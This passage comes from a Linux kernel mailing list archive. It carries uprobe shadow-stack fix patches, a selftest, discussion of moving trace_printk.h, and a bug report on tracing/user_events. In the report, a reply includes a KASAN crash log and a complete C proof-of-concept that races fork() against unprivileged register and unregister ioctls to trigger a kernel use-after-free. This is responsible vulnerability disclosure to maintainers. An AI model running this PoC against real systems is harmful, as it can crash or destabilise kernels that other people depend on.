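folio_batch_move_lru() the batch is empty, so the count must be captured
first to be reported.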



* [PATCH 2/2] selftests/x86: Add shadow stack uprobe CALL test
From: David Windsor @ 2026-06-22 18:31 UTC
  To: mhiramat, oleg, peterz
  Cc: tglx, mingo, bp, dave.hansen, x86, shuah, linux-trace-kernel,
	linux-kselftest, linux-kernel, David Windsor
In-Reply-To: <20260622183109.1137245-1-dwindsor@gmail.com>

Add coverage for entry uprobes installed on CALL instructions while user
shadow stack is enabled. The test puts an entry uprobe on a helper whose
first instruction is a relative CALL, then verifies that the call/return
sequence completes without SIGSEGV.

This catches regressions where x86 uprobe CALL emulation updates the
regular user stack but leaves the CET shadow stack stale.

Signed-off-by: David Windsor <dwindsor@gmail.com>
---
 tools/testing/selftests/x86/test_shadow_stack.c | 86 +++++++++++++++++++++++++
 1 file changed, 86 insertions(+)

diff --git a/tools/testing/selftests/x86/test_shadow_stack.c b/tools/testing/selftests/x86/test_shadow_stack.c
index 21af54d5f4ea..3d6ca33edba4 100644
--- a/tools/testing/selftests/x86/test_shadow_stack.c
+++ b/tools/testing/selftests/x86/test_shadow_stack.c
@@ -873,6 +873,86 @@ static int test_uretprobe(void)
 	return err;
 }
 
+/* Keep the CALL first so the function address is exactly the probed CALL. */
+extern void uprobe_call_trigger(void);
+asm (".pushsection .text\n"
+	".global uprobe_call_target\n"
+	".type uprobe_call_target, @function\n"
+	"uprobe_call_target:\n"
+	"	ret\n"
+	".size uprobe_call_target, .-uprobe_call_target\n"
+
+	".global uprobe_call_trigger\n"
+	".type uprobe_call_trigger, @function\n"
+	"uprobe_call_trigger:\n"
+	"	call uprobe_call_target\n"
+	"	ret\n"
+	".size uprobe_call_trigger, .-uprobe_call_trigger\n"
+	".popsection\n"
+);
+
+/* If CALL emulation misses the shadow stack update, this exits via SIGSEGV. */
+static int test_uprobe_call(void)
+{
+	const size_t attr_sz = sizeof(struct perf_event_attr);
+	const char *file = "/proc/self/exe";
+	int fd = -1, type, err = 1;
+	struct perf_event_attr attr;
+	struct sigaction sa = {};
+	ssize_t offset;
+
+	type = determine_uprobe_perf_type();
+	if (type < 0) {
+		if (type == -ENOENT)
+			printf("[SKIP]\tUprobe on CALL test, uprobes are not available\n");
+		return 0;
+	}
+
+	offset = get_uprobe_offset(uprobe_call_trigger);
+	if (offset < 0)
+		return 1;
+
+	sa.sa_sigaction = segv_gp_handler;
+	sa.sa_flags = SA_SIGINFO;
+	if (sigaction(SIGSEGV, &sa, NULL))
+		return 1;
+
+	/* Setup entry uprobe through perf event interface. */
+	memset(&attr, 0, attr_sz);
+	attr.size = attr_sz;
+	attr.type = type;
+	attr.config = 0;
+	attr.config1 = (__u64)(unsigned long)file;
+	attr.config2 = offset;
+
+	fd = syscall(__NR_perf_event_open, &attr, 0 /* pid */, -1 /* cpu */,
+		     -1 /* group_fd */, PERF_FLAG_FD_CLOEXEC);
+	if (fd < 0)
+		goto out;
+
+	if (sigsetjmp(jmp_buffer, 1))
+		goto out;
+
+	if (ARCH_PRCTL(ARCH_SHSTK_ENABLE, ARCH_SHSTK_SHSTK))
+		goto out;
+
+	/*
+	 * This either segfaults and goes through sigsetjmp above
+	 * or succeeds and we're good.
+	 */
+	uprobe_call_trigger();
+
+	printf("[OK]\tUprobe on CALL test\n");
+	err = 0;
+
+out:
+	ARCH_PRCTL(ARCH_SHSTK_DISABLE, ARCH_SHSTK_SHSTK);
+	signal(SIGSEGV, SIG_DFL);
+	if (fd >= 0)
+		close(fd);
+	return err;
+}
+
 void segv_handler_ptrace(int signum, siginfo_t *si, void *uc)
 {
 	/* The SSP adjustment caused a segfault. */
@@ -1071,6 +1151,12 @@ int main(int argc, char *argv[])
 		goto out;
 	}
 
+	if (test_uprobe_call()) {
+		ret = 1;
+		printf("[FAIL]\tuprobe on CALL test\n");
+		goto out;
+	}
+
 	return ret;
 
 out:
-- 
2.43.0
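
The test relies on a common selftest idiom: install a SIGSEGV handler that
siglongjmp()s back to a sigsetjmp() point, so a fault becomes a test failure
instead of killing the process. A standalone sketch of that idiom follows;
run_catching_segv() and its handler are hypothetical (the selftest's own
segv_gp_handler and jmp_buffer live elsewhere in the file), and
raise(SIGSEGV) stands in for the SIGSEGV delivered after a shadow stack #CP.

```c
#define _POSIX_C_SOURCE 200809L
#include <assert.h>
#include <setjmp.h>
#include <signal.h>
#include <string.h>

static sigjmp_buf demo_jmp;

/* On SIGSEGV, jump back to the sigsetjmp() point instead of dying. */
static void demo_segv_handler(int sig, siginfo_t *si, void *uc)
{
	(void)sig;
	(void)si;
	(void)uc;
	siglongjmp(demo_jmp, 1);
}

/*
 * Run fn() with the handler installed. Returns 0 if fn() returned normally
 * and 1 if it raised SIGSEGV; the default action is restored either way.
 */
static int run_catching_segv(void (*fn)(void))
{
	struct sigaction sa;
	volatile int err = 1;

	memset(&sa, 0, sizeof(sa));
	sigemptyset(&sa.sa_mask);
	sa.sa_sigaction = demo_segv_handler;
	sa.sa_flags = SA_SIGINFO;
	if (sigaction(SIGSEGV, &sa, NULL))
		return 1;

	/* savemask=1 so SIGSEGV is unblocked again after the jump. */
	if (sigsetjmp(demo_jmp, 1))
		goto out;

	fn();
	err = 0;
out:
	signal(SIGSEGV, SIG_DFL);
	return err;
}

static void returns_normally(void)
{
}

/* Stands in for a CALL/RET sequence that trips a shadow stack #CP. */
static void faults(void)
{
	raise(SIGSEGV);
}
```

Passing 1 as the second argument to sigsetjmp() is what makes repeated runs
work: without restoring the signal mask, SIGSEGV would stay blocked after the
first jump out of the handler.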


* [PATCH 1/2] x86/uprobes: Keep shadow stack in sync for emulated CALLs
From: David Windsor @ 2026-06-22 18:31 UTC
  To: mhiramat, oleg, peterz
  Cc: tglx, mingo, bp, dave.hansen, x86, shuah, linux-trace-kernel,
	linux-kselftest, linux-kernel, David Windsor

Uprobe CALL emulation updates the normal user stack, but not the CET user
shadow stack. The subsequent RET then sees a stale shadow stack entry and
raises #CP.

Update the relative CALL emulation and XOL CALL fixup paths to keep the
shadow stack in sync.

Fixes: 488af8ea7131 ("x86/shstk: Wire in shadow stack interface")
Signed-off-by: David Windsor <dwindsor@gmail.com>
---
 arch/x86/kernel/uprobes.c | 10 +++++++++-
 1 file changed, 9 insertions(+), 1 deletion(-)

diff --git a/arch/x86/kernel/uprobes.c b/arch/x86/kernel/uprobes.c
index ebb1baf1eb1d..ae32013a7097 100644
--- a/arch/x86/kernel/uprobes.c
+++ b/arch/x86/kernel/uprobes.c
@@ -1246,8 +1246,12 @@ static int default_post_xol_op(struct arch_uprobe *auprobe, struct pt_regs *regs
 		long correction = utask->vaddr - utask->xol_vaddr;
 		regs->ip += correction;
 	} else if (auprobe->defparam.fixups & UPROBE_FIX_CALL) {
+		unsigned long retaddr = utask->vaddr + auprobe->defparam.ilen;
+
 		regs->sp += sizeof_long(regs); /* Pop incorrect return address */
-		if (emulate_push_stack(regs, utask->vaddr + auprobe->defparam.ilen))
+		if (emulate_push_stack(regs, retaddr))
+			return -ERESTART;
+		if (shstk_update_last_frame(retaddr))
 			return -ERESTART;
 	}
 	/* popf; tell the caller to not touch TF */
@@ -1338,6 +1342,10 @@ static bool branch_emulate_op(struct arch_uprobe *auprobe, struct pt_regs *regs)
 		 */
 		if (emulate_push_stack(regs, new_ip))
 			return false;
+		if (shstk_push(new_ip) == -EFAULT) {
+			regs->sp += sizeof_long(regs);
+			return false;
+		}
 	} else if (!check_jmp_cond(auprobe, regs)) {
 		offs = 0;
 	}
-- 
2.43.0
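
Why both stacks must be updated can be seen in a toy model: with shadow
stacks enabled, a hardware CALL pushes the return address to the normal stack
and to the shadow stack, and RET compares the two. struct cpu_model and its
helpers are hypothetical. emulate_call() with update_shstk set loosely
corresponds to emulate_push_stack() plus shstk_push() in branch_emulate_op(),
and xol_fixup() to the pop/push plus shstk_update_last_frame() in
default_post_xol_op().

```c
#include <assert.h>
#include <stdbool.h>

#define DEMO_DEPTH 16

/* Toy thread state: a normal stack plus a CET-style shadow stack. */
struct cpu_model {
	unsigned long stack[DEMO_DEPTH];
	unsigned long shstk[DEMO_DEPTH];
	int sp, ssp;
};

/* A hardware CALL with shadow stacks enabled pushes to both stacks. */
static void hw_call(struct cpu_model *c, unsigned long retaddr)
{
	c->stack[c->sp++] = retaddr;
	c->shstk[c->ssp++] = retaddr;
}

/*
 * Emulated CALL: before the fix only the normal stack was written
 * (update_shstk == false); the fix also pushes to the shadow stack.
 */
static void emulate_call(struct cpu_model *c, unsigned long retaddr,
			 bool update_shstk)
{
	c->stack[c->sp++] = retaddr;
	if (update_shstk)
		c->shstk[c->ssp++] = retaddr;
}

/*
 * Out-of-line CALL fixup: the single-stepped CALL pushed the XOL return
 * address to both stacks; rewrite the top of each with the real one.
 */
static void xol_fixup(struct cpu_model *c, unsigned long retaddr,
		      bool update_shstk)
{
	c->stack[c->sp - 1] = retaddr;
	if (update_shstk)
		c->shstk[c->ssp - 1] = retaddr;
}

/* RET pops both stacks; a mismatch is what the CPU reports as #CP. */
static bool ret_ok(struct cpu_model *c)
{
	unsigned long ra = c->stack[--c->sp];
	unsigned long sra = c->ssp ? c->shstk[--c->ssp] : 0;

	return ra == sra;
}
```

In the unfixed emulation path the first RET pops the probed CALL's return
address from the normal stack but the caller's return address from the
shadow stack, which is the stale-entry mismatch the commit message describes.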


* Re: [PATCH] tracing/user_events: fix use-after-free of enabler in user_event_mm_dup()
From: XIAO WU @ 2026-06-22 17:03 UTC
  To: Michael Bommarito, Steven Rostedt, Masami Hiramatsu,
	Mathieu Desnoyers
  Cc: Beau Belgrave, linux-trace-kernel, linux-kernel, stable
In-Reply-To: <20260618222743.538915-1-michael.bommarito@gmail.com>

Hi,

I came across the Sashiko AI review [1] in this thread and wanted to
share some test results that may be useful.

First — thank you for this patch!  The enabler UAF in
user_event_mm_dup() is a real bug and the fix (kfree → kfree_rcu) is
the right approach for protecting the RCU list walkers.  The selftest
results you included in the commit are also really helpful.

However, I was able to reproduce a second UAF on the *user_event*
object that the Sashiko review flagged — it's still reachable after the
patch is applied.  I've included a PoC and crash log below.

On Thu, Jun 18, 2026 at 06:27:43PM -0400, Michael Bommarito wrote:
 > @@ -404,7 +407,12 @@ static void user_event_enabler_destroy(struct user_event_enabler *enabler,
 >      /* No longer tracking the event via the enabler */
 >      user_event_put(enabler->event, locked);
 >
 > -    kfree(enabler);
 > +    /*
 > +     * The enabler is removed from an RCU-traversed list
 > +     * (user_event_mm_dup walks mm->enablers under rcu_read_lock only),
 > +     * so the backing memory must outlive a grace period.
 > +     */
 > +    kfree_rcu(enabler, rcu);
 >  }

The issue: user_event_put(enabler->event, locked) is called
synchronously, before kfree_rcu(enabler, rcu).  If this drops the last
reference to the user_event, delayed_destroy_user_event() is scheduled
on a workqueue, which calls destroy_user_event() → kfree(user).  The
user_event memory is freed without RCU protection.

But the enabler itself is now protected by kfree_rcu — it remains
visible to RCU readers in user_event_mm_dup() during fork().  Those
readers access enabler->event (via user_event_enabler_dup →
user_event_get(orig->event)), which now points to freed memory:

   fork()                                       unregister
   ────────                                     ──────────
   user_event_mm_dup()
     rcu_read_lock();
     list_for_each_entry_rcu(enabler, ...)
                                                user_event_enabler_destroy()
                                                  list_del_rcu(enabler)
                                                  user_event_put(enabler->event)
                                                    → last ref!
                                                    → schedule_work(put_work)
                                                  kfree_rcu(enabler, rcu)
       user_event_enabler_dup(enabler, ...)     [workqueue]
         enabler->event =                         delayed_destroy_user_event()
           user_event_get(orig->event);             destroy_user_event()
           ↑ UAF: orig->event was freed!              kfree(user_event)
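
The ordering problem in the diagram above can be replayed deterministically
on one thread. In this sketch a "freed" flag replaces kfree() so nothing is
actually freed, and the enabler is simply never released (standing in for
kfree_rcu() waiting for the reader). struct demo_event, struct demo_enabler
and replay_race() are hypothetical stand-ins for user_event,
user_event_enabler and the reported interleaving.

```c
#include <assert.h>
#include <stdbool.h>

/* Stand-in for struct user_event; "freed" replaces kfree(). */
struct demo_event {
	int refcount;
	bool freed;
};

/* Stand-in for struct user_event_enabler, still visible to RCU readers. */
struct demo_enabler {
	struct demo_event *event;
};

/* Like user_event_put(): the last ref eventually leads to kfree(). */
static void demo_event_put(struct demo_event *e)
{
	if (--e->refcount == 0)
		e->freed = true;
}

/*
 * Reader side in fork(): user_event_enabler_dup() takes a reference on
 * orig->event. Returns false where the kernel would touch freed memory.
 */
static bool demo_reader_get(struct demo_enabler *en)
{
	if (en->event->freed)
		return false;
	en->event->refcount++;
	return true;
}

/*
 * Replay the reported interleaving. The enabler itself stays valid
 * (kfree_rcu() waits for the reader), but the event it points to does not.
 */
static bool replay_race(int initial_refs)
{
	struct demo_event ev = { .refcount = initial_refs, .freed = false };
	struct demo_enabler en = { .event = &ev };

	/* fork(): rcu_read_lock(); enabler found on mm->enablers */
	/* unregister: list_del_rcu(), then user_event_put(enabler->event) */
	demo_event_put(en.event);
	/* unregister: kfree_rcu(enabler) is deferred past the reader */
	/* fork(): user_event_enabler_dup() -> user_event_get(orig->event) */
	return demo_reader_get(&en);
}
```

When the enabler held the only reference (initial_refs == 1), the reader
finds a freed event; if some other holder kept a reference (initial_refs ==
2), the same interleaving is harmless, which matches the report's point that
the crash needs the put to drop the last reference.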

[Reproduction]

The PoC runs as an unprivileged user with access to
/sys/kernel/tracing/user_events_data.  It creates two threads sharing
the same mm:

   - fork_worker:  continuously calls fork()/waitpid(), which triggers
                   user_event_mm_dup() → RCU list walk
   - unreg_worker: continuously registers (DIAG_IOCSREG) and unregisters
                   (DIAG_IOCSUNREG) an event enabler, which calls
                   user_event_enabler_destroy()

The race window is small but reproducible within a few iterations on a
multi-CPU QEMU VM.

[Crash log — kernel 7.1.0-next-20260618, CONFIG_KASAN=y, SMP]

   BUG: KASAN: slab-use-after-free in user_event_mm_dup+0x319/0x630
   Write of size 4 at addr ffff88802c786fa8 by task poc/29997

   Call Trace:
    <TASK>
    dump_stack_lvl
    print_report
    kasan_report
    kasan_check_range
    user_event_mm_dup+0x319/0x630
    copy_process+0x650f/0x8090
    kernel_clone+0x214/0x9c0
    __do_sys_clone+0xce/0x120
    do_syscall_64
    entry_SYSCALL_64_after_hwframe
    </TASK>

   Allocated by task 29998:
    kasan_save_stack
    __kasan_kmalloc
    __kmalloc_cache_noprof
    user_event_parse_cmd+0x721/0x2aa0
    user_events_ioctl+0xcc0/0x1d00
    __x64_sys_ioctl
    do_syscall_64

   Freed by task 5014:
    kasan_save_stack
    __kasan_slab_free
    kfree+0x165/0x710
    destroy_user_event+0x375/0x4f0
    delayed_destroy_user_event+0x8d/0x110
    process_one_work
    worker_thread
    kthread

   Last potentially related work creation:
    queue_work_on
    user_event_put+0x25d/0x460
    user_events_ioctl+0x1795/0x1d00
    __x64_sys_ioctl
    do_syscall_64

   ------------[ cut here ]------------
   refcount_t: addition on 0; use-after-free.
   WARNING: lib/refcount.c:25 at refcount_warn_saturate+0xf9/0x120
   Call Trace:
    user_event_mm_dup+0x349/0x630

The refcount warning on top of the KASAN report independently confirms
this: user_event_get(orig->event) is trying to increment a refcount that
has already dropped to zero, on memory that has already been freed.
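The "addition on 0" wording comes from refcount_t's checks: incrementing a counter that has already reached zero is treated as a use-after-free. A minimal userspace model with C11 atomics (hypothetical names, not the kernel's refcount_t API) contrasts that checked increment with the inc-not-zero idiom RCU readers commonly use:

```c
#include <assert.h>
#include <stdatomic.h>
#include <stdbool.h>

/* Hypothetical userspace stand-in for a refcounted object. */
struct model_ref {
	atomic_uint refs;
};

/*
 * Plain increment, checked like refcount_inc(): returns false where the
 * kernel would warn "addition on 0; use-after-free". (The kernel also
 * saturates the counter; this model just leaves it at 1.)
 */
bool model_ref_inc(struct model_ref *r)
{
	return atomic_fetch_add(&r->refs, 1u) != 0;
}

/*
 * inc-not-zero idiom, like refcount_inc_not_zero(): take a reference only
 * if the object is still live, and never move the count off zero.
 */
bool model_ref_inc_not_zero(struct model_ref *r)
{
	unsigned int old = atomic_load(&r->refs);

	do {
		if (old == 0)
			return false;
	} while (!atomic_compare_exchange_weak(&r->refs, &old, old + 1));
	return true;
}
```

The inc-not-zero form only helps if the memory is still valid when it is read (for example, because the object itself is freed after an RCU grace period). In the report above the user_event had already been returned to the slab, so no choice of increment avoids the KASAN report on its own.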

The PoC is attached below.  It is a single C file and compiles with:

   gcc -o poc poc.c -static -lpthread

[1] https://sashiko.dev/#/patchset/20260618222743.538915-1-michael.bommarito%40gmail.com
     (Sashiko AI code review — "Use-After-Free", Severity: Critical)

Thanks,
XIAO

// PoC: user_event UAF on event object via user_event_mm_dup()
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <pthread.h>
#include <sched.h>
#include <sys/mman.h>
#include <sys/ioctl.h>
#include <sys/wait.h>
#include <stdint.h>

#define DIAG_IOC_MAGIC  '*'
#define DIAG_IOCSREG    _IOWR(DIAG_IOC_MAGIC, 0, struct user_reg*)
#define DIAG_IOCSDEL    _IOW(DIAG_IOC_MAGIC, 1, char*)
#define DIAG_IOCSUNREG  _IOW(DIAG_IOC_MAGIC, 2, struct user_unreg*)

struct user_reg {
     uint32_t size; uint8_t enable_bit; uint8_t enable_size;
     uint16_t flags; uint64_t enable_addr; uint64_t name_args;
     uint32_t write_index;
} __attribute__((__packed__));

struct user_unreg {
     uint32_t size; uint8_t disable_bit; uint8_t __reserved;
     uint16_t __reserved2; uint64_t disable_addr;
} __attribute__((__packed__));

static volatile int stop_flag = 0;
static void *enable_page = NULL;
static const char *event_name = "poc_uaf_test";

static int open_fd(void)
{
     int fd = open("/sys/kernel/tracing/user_events_data", O_WRONLY);
     if (fd < 0)
         fd = open("/sys/kernel/debug/tracing/user_events_data", O_WRONLY);
     return fd;
}

static int do_reg(int fd, void *addr)
{
     struct user_reg reg = {0};
     reg.size = sizeof(reg);
     reg.enable_bit = 0;
     reg.enable_size = 4;
     reg.flags = 0;
     reg.enable_addr = (uint64_t)(unsigned long)addr;
     reg.name_args = (uint64_t)(unsigned long)event_name;
     return ioctl(fd, DIAG_IOCSREG, &reg);
}

static int do_unreg(int fd, void *addr)
{
     struct user_unreg unreg = {0};
     unreg.size = sizeof(unreg);
     unreg.disable_bit = 0;
     unreg.disable_addr = (uint64_t)(unsigned long)addr;
     return ioctl(fd, DIAG_IOCSUNREG, &unreg);
}

static void *fork_worker(void *arg)
{
     pid_t pid; int status;
     cpu_set_t cpuset;
     CPU_ZERO(&cpuset); CPU_SET(1, &cpuset);
     pthread_setaffinity_np(pthread_self(), sizeof(cpuset), &cpuset);
     while (!stop_flag) {
         pid = fork();
         if (pid == 0) _exit(0);
         else if (pid > 0) waitpid(pid, &status, 0);
         else usleep(100);
     }
     return NULL;
}

static void *unreg_worker(void *arg)
{
     int fd;
     cpu_set_t cpuset;
     CPU_ZERO(&cpuset); CPU_SET(2, &cpuset);
     pthread_setaffinity_np(pthread_self(), sizeof(cpuset), &cpuset);
     while (!stop_flag) {
         fd = open_fd();
         if (fd < 0) continue;
         /* Ensure an enabler exists, then unregister to destroy it */
         if (do_reg(fd, enable_page) < 0 && errno == EADDRINUSE) {
             do_unreg(fd, enable_page);
             do_reg(fd, enable_page);
         }
         close(fd);
         fd = open_fd();
         if (fd < 0) continue;
         do_unreg(fd, enable_page);
         close(fd);
         usleep(100);
     }
     return NULL;
}

int main(int argc, char **argv)
{
     pthread_t t_fork, t_unreg;
     int fd, i, iters = 30;
     if (argc > 1) iters = atoi(argv[1]);
     printf("[+] PoC: user_event UAF in user_event_mm_dup\n");
     printf("[+] Running %d iterations (3s each)\n", iters);
     enable_page = mmap(NULL, 4096, PROT_READ|PROT_WRITE,
         MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
     if (enable_page == MAP_FAILED) { perror("mmap"); return 1; }
     memset(enable_page, 0, 4096);
     fd = open_fd();
     if (fd < 0) {
         perror("open /sys/kernel/tracing/user_events_data");
         return 1;
     }
     if (do_reg(fd, enable_page) < 0 && errno != EADDRINUSE) {
         perror("reg"); close(fd); return 1;
     }
     close(fd);
     printf("[+] Event initialized\n");
     for (i = 0; i < iters; i++) {
         printf("[+] Iter %d/%d\n", i+1, iters);
         /* Re-create enabler */
         fd = open_fd();
         if (fd >= 0) {
             if (do_reg(fd, enable_page) < 0 && errno == EADDRINUSE) {
                 do_unreg(fd, enable_page);
                 do_reg(fd, enable_page);
             }
             close(fd);
         }
         stop_flag = 0;
         pthread_create(&t_fork, NULL, fork_worker, NULL);
         pthread_create(&t_unreg, NULL, unreg_worker, NULL);
         sleep(3); /* POSIX does not guarantee usleep() for >= 1000000 us */
         stop_flag = 1;
         pthread_join(t_unreg, NULL);
         pthread_join(t_fork, NULL);
     }
     printf("[+] Done\n");
     return 0;
}


^ permalink raw reply

* Re: [PATCH 0/2] tracing: Move trace_printk.h out of kernel.h
From: Steven Rostedt @ 2026-06-22 16:51 UTC (permalink / raw)
  To: Randy Dunlap
  Cc: Peter Zijlstra, linux-kernel, linux-trace-kernel,
	Masami Hiramatsu, Mark Rutland, Mathieu Desnoyers, Andrew Morton,
	Linus Torvalds, Sebastian Andrzej Siewior, John Ogness,
	Thomas Gleixner, Julia Lawall, Yury Norov, linux-doc,
	linux-kbuild, linuxppc-dev, dri-devel, linux-stm32,
	linux-arm-kernel, linux-rdma, linux-usb, linux-ext4, linux-nfs,
	kvm, intel-gfx
In-Reply-To: <08b3c961-18bb-43d9-8d7f-8a87bcad0afa@infradead.org>

On Mon, 22 Jun 2026 09:40:45 -0700
Randy Dunlap <rdunlap@infradead.org> wrote:

> > Did you forget your C 101 class? If you use a function, you gotta
> > include the relevant header.  
> 
> Also item #1 in Documentation/process/submit-checklist.rst.

What is that? Remove all trace_printk()s before you submit?

Because that is what you should do. But now you also need to remember
to remove the include <linux/trace_printk.h> too. Or, I guess if
someone uses it a lot, they may just keep it in their files without the
trace_printk()s.

-- Steve

^ permalink raw reply

* Re: [PATCH 0/2] tracing: Move trace_printk.h out of kernel.h
From: Randy Dunlap @ 2026-06-22 16:40 UTC (permalink / raw)
  To: Peter Zijlstra, Steven Rostedt
  Cc: linux-kernel, linux-trace-kernel, Masami Hiramatsu, Mark Rutland,
	Mathieu Desnoyers, Andrew Morton, Linus Torvalds,
	Sebastian Andrzej Siewior, John Ogness, Thomas Gleixner,
	Julia Lawall, Yury Norov, linux-doc, linux-kbuild, linuxppc-dev,
	dri-devel, linux-stm32, linux-arm-kernel, linux-rdma, linux-usb,
	linux-ext4, linux-nfs, kvm, intel-gfx
In-Reply-To: <20260622083440.GX49951@noisy.programming.kicks-ass.net>



On 6/22/26 1:34 AM, Peter Zijlstra wrote:
> On Sun, Jun 21, 2026 at 05:34:30AM -0400, Steven Rostedt wrote:
>> There have been complaints about trace_printk() being defined in kernel.h as it
>> can increase the compilation time. As it is only used by some developers for
>> debugging purposes, it should not be in kernel.h causing lots of wasted CPU
>> cycles for those that do not ever care about it.
>>
>> Instead, add a CONFIG_TRACE_PRINTK_DEBUGGING option that developers that do
>> use it can set and not have to always remember to add #include <linux/trace_printk.h>
>> to the files they add trace_printk() to while debugging. It also means that
>> those that do not have that config set will not have to worry about wasted
>> CPU cycles as it is only included in the CFLAGS when the option is set, and
>> it's completely ignored otherwise.
> 
> Did you forget your C 101 class? If you use a function, you gotta
> include the relevant header.

Also item #1 in Documentation/process/submit-checklist.rst.

> You don't see userspace saying: 'Hey, you know what, perhaps we should
> add stdio.h to every other header, just in case someone wants to
> printf()' either.
> 
> I really don't understand your argument. Yes, maybe someone will forget
> and then either their editor (if they have a halfway modern setup with
> LSP enabled) or their build will complain, but so what? This is all
> trivial stuff, surely we have more pressing matters to concern ourselves
> with?



-- 
~Randy


^ permalink raw reply

* Re: [PATCH v3] mm/lruvec: trace LRU add drains and drain-all requests
From: JP Kobryn @ 2026-06-22 16:38 UTC (permalink / raw)
  To: David Hildenbrand (Arm), Vlastimil Babka (SUSE), Shakeel Butt
  Cc: linux-mm, willy, usama.arif, akpm, mhocko, rostedt, mhiramat,
	mathieu.desnoyers, kasong, qi.zheng, baohua, axelrasmussen,
	yuanchu, weixugc, chrisl, shikemeng, nphamcs, baoquan.he,
	youngjun.park, linux-kernel, linux-trace-kernel
In-Reply-To: <d4b55716-97c7-4e75-8500-6a1171ad7fc6@kernel.org>

On 6/18/26 5:38 AM, David Hildenbrand (Arm) wrote:
> On 6/18/26 10:30, Vlastimil Babka (SUSE) wrote:
>> On 6/18/26 10:21, David Hildenbrand (Arm) wrote:
>>> On 6/17/26 20:18, Vlastimil Babka (SUSE) wrote:
>>>>
>>>> Yeah and I don't recall ever that a change to a mm tracepoint would ever
>>>> break someone who'd complain and we'd have to revert it.
>>> Really? :)
>>>
>>> Read the context of the link I posted once more.
>>
>> Ah, I see. I've only read the single mail from Steven that referred to the
>> old powertop breakage and didn't notice the context.
>>
>> But I don't think these worries should stop us from adding easily usable
>> tracepoints.
> 
> Steve explained how the scheduler folks apparently handle it without
> trace events.
> 
> You can always remove/modify tracepoints, but not trace events.
> 
> Anyhow, just wanted to mention it, because so far MM didn't really know about
> this implication.
> 

Thanks for pointing this out. I'll send v4 using DECLARE_TRACE() to
avoid creating a new event.


^ permalink raw reply

* Re: [PATCH v2 1/2] tracing: Move non-trace_printk prototypes into trace_controls.h
From: Yury Norov @ 2026-06-22 16:02 UTC (permalink / raw)
  To: Steven Rostedt
  Cc: Yury Norov, linux-kernel, linux-trace-kernel, Masami Hiramatsu,
	Mark Rutland, Mathieu Desnoyers, Andrew Morton, Linus Torvalds,
	Sebastian Andrzej Siewior, John Ogness, Thomas Gleixner,
	Peter Zijlstra, Julia Lawall
In-Reply-To: <20260622112127.5763f5ba@fedora>

On Mon, Jun 22, 2026 at 11:21:27AM -0400, Steven Rostedt wrote:
> On Mon, 22 Jun 2026 09:41:16 -0400
> Yury Norov <yury.norov@gmail.com> wrote:
> 
> > On Mon, Jun 22, 2026 at 09:07:40AM -0400, Steven Rostedt wrote:
> > > From: Steven Rostedt <rostedt@goodmis.org>
> > > 
> > > In order to remove the include to trace_printk.h from kernel.h the tracing
> > > control prototypes need to be separated into their own header file as they
> > > are used in other common header files like rcu.h. There's no point in
> > > removing trace_printk.h from kernel.h if it just gets added back to other
> > > common headers.
> > > 
> > > Prototypes are very cheap for the compiler and should not be an issue.
> > > 
> > > Signed-off-by: Steven Rostedt <rostedt@goodmis.org>  
> > 
> > Suggested-by: Yury Norov <yury.norov@gmail.com>
> 
> Thanks, I'll add your tag.

Thanks, but can you also comment on trace_dump/ftrace_dump?

^ permalink raw reply

* Re: [PATCH v2 2/2] tracing: Remove trace_printk.h from kernel.h
From: Yury Norov @ 2026-06-22 16:01 UTC (permalink / raw)
  To: Steven Rostedt
  Cc: linux-kernel, linux-trace-kernel, Masami Hiramatsu, Mark Rutland,
	Mathieu Desnoyers, Andrew Morton, Linus Torvalds,
	Sebastian Andrzej Siewior, John Ogness, Thomas Gleixner,
	Peter Zijlstra, Julia Lawall, Yury Norov
In-Reply-To: <20260622131029.816825024@kernel.org>

On Mon, Jun 22, 2026 at 09:07:41AM -0400, Steven Rostedt wrote:
> From: Steven Rostedt <rostedt@goodmis.org>
> 
> There have been complaints about trace_printk.h causing more build time
> for being in kernel.h. Move it out of kernel.h and place it in the headers
> and C files that use it.
> 
> Link: https://lore.kernel.org/all/CAHk-=wikCBeVFjVXiY4o-oepdbjAoir5+TcAgtL12c4u1TpZLQ@mail.gmail.com/

Link is nice, but can you explain in the commit message what exactly
those complaints are? Enough opinions have been shared to make a nice
summary. I even think it's important enough to become a Documentation
rule.
 
> Signed-off-by: Steven Rostedt <rostedt@goodmis.org>
> ---
> Changes since v1: https://patch.msgid.link/20260621093811.168514984@kernel.org
> 
> - Just remove trace_printk.h and fix up all the places that need it.
> 
>  arch/powerpc/kvm/book3s_xics.c         | 1 +
>  drivers/gpu/drm/i915/gt/intel_gtt.h    | 1 +
>  drivers/gpu/drm/i915/i915_gem.h        | 1 +
>  drivers/hwtracing/stm/dummy_stm.c      | 4 ++++
>  drivers/infiniband/hw/hfi1/trace_dbg.h | 1 +
>  drivers/usb/early/xhci-dbc.c           | 1 +
>  fs/ext4/inline.c                       | 1 +
>  include/linux/ftrace.h                 | 2 ++
>  include/linux/kernel.h                 | 1 -
>  include/linux/sunrpc/debug.h           | 1 +
>  include/linux/trace_printk.h           | 5 +++--
>  kernel/trace/ring_buffer_benchmark.c   | 1 +
>  samples/fprobe/fprobe_example.c        | 1 +
>  samples/ftrace/ftrace-direct-too.c     | 1 -
>  samples/trace_printk/trace-printk.c    | 1 +
>  15 files changed, 19 insertions(+), 4 deletions(-)
> 
> diff --git a/arch/powerpc/kvm/book3s_xics.c b/arch/powerpc/kvm/book3s_xics.c
> index 74a44fa702b0..ef5eb596a56e 100644
> --- a/arch/powerpc/kvm/book3s_xics.c
> +++ b/arch/powerpc/kvm/book3s_xics.c
> @@ -26,6 +26,7 @@
>  #if 1
>  #define XICS_DBG(fmt...) do { } while (0)
>  #else
> +#include <linux/trace_printk.h>
>  #define XICS_DBG(fmt...) trace_printk(fmt)
>  #endif
>  
> diff --git a/drivers/gpu/drm/i915/gt/intel_gtt.h b/drivers/gpu/drm/i915/gt/intel_gtt.h
> index b54ee4f25af1..f6f223090760 100644
> --- a/drivers/gpu/drm/i915/gt/intel_gtt.h
> +++ b/drivers/gpu/drm/i915/gt/intel_gtt.h
> @@ -35,6 +35,7 @@
>  #define I915_GFP_ALLOW_FAIL (GFP_KERNEL | __GFP_RETRY_MAYFAIL | __GFP_NOWARN)
>  
>  #if IS_ENABLED(CONFIG_DRM_I915_TRACE_GTT)
> +#include <linux/trace_printk.h>

So, before it was included unconditionally; now it's included conditionally.
It looks technically correct, but conceptually I'm not sure.

I'm not a developer of this driver, but here trace_printk.h is needed if
